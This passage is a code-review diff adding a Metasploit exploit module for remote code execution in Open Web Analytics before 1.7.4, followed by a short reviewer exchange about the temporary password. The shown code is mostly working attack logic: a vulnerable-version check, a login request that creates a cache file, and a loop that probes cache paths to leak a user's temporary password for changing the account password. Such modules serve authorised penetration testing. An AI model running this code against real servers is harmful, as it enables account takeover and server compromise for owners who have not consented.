modules/exploits/multi/http/open_web_analytics_rce.rb

```diff
@@ -0,0 +1,254 @@
+        'DisclosureDate' => '2022-03-18',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [
+            ARTIFACTS_ON_DISK, # /owa-data/caches/{get_random_string(8)}.php
+            IOC_IN_LOGS, # Malicious GET/POST requests in the webservice logs
+            ACCOUNT_LOCKOUTS, # Account passwords will be changed in this module
+          ]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('Username', [ false, 'Target username (Default: admin)']),
+      OptString.new('Password', [ false, 'Target new password (Default: pwned)']),
+      OptString.new('Directory', [ false, 'Path to the owa installation (Default: /var/www/html/)'])
+    ])
+  end
+
+  def check
+    res = check_connection
+    return CheckCode::Unknown('Connection failed') unless res
+    return CheckCode::Safe if !res.body.include?('Open Web Analytics')
+
+    version = Rex::Version.new(res.body.scan(/version=([\d.]+)/).flatten.first)
+    return CheckCode::Detected("Open Web Analytics #{version} detected") unless version < Rex::Version.new('1.7.4')
+
+    CheckCode::Appears("Open Web Analytics #{version} is vulnerable")
+  end
+
+  def exploit
+    username = datastore['Username']
+    new_password = datastore['Password']
+
+    res = check_connection
+    if res
+      print_good("Connected to #{full_uri} successfully!")
+    end
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.loginForm'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'owa_user_id' => username,
+        'owa_password' => rand_text_alphanumeric(8),
+        'owa_action' => 'base.login'
+      }
+    )
+    if res.code != 200
+      fail_with(Failure::Unknown, 'An error occured during the login attempt!')
+    end
+
+    print_status("Attempting to find cache of '#{username}' user")
+
+    found = false
+    cache = nil
+    100.times do |key|
+      user_id = "user_id#{key}"
+      userid_hash = Digest::MD5.hexdigest(user_id)
+      filename = "#{userid_hash}.php"
+      cache_request = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, "/owa-data/caches/#{key}/owa_user/#{filename}")
+      )
+      if cache_request.code == 404
+        next
+      end
+
+      cache_raw = cache_request.body
+      cache = get_cache_content(cache_raw)
+      cache_username = get_cache_username(cache)
+      if cache_username != username
+        print_message("The temporary password for a different user was found. \"#{cache_username}\": #{get_cache_temppass(cache)}", 'INFO')
+        next
+      else
+        found = true
+        break
+      end
+    end
+
+    if !found
+      fail_with(Failure::Unknown, "No cache found. Are you sure \"#{username}\" is a valid user?")
+    end
+
+    cache_temppass = get_cache_temppass(cache)
```

Comment:
What is the temp password exactly? Is it the current user password before it's been changed? If so, I think this is a good idea to try to restore it once the exploit finishes.

Reply:
The temp password is used to set a new password via the usersChangePassword action, so its not the current user password as that is hashed and therefore not usable. Restoring would indeed be a great idea, but I dont think thats possible here, as we have no way of knowing the original password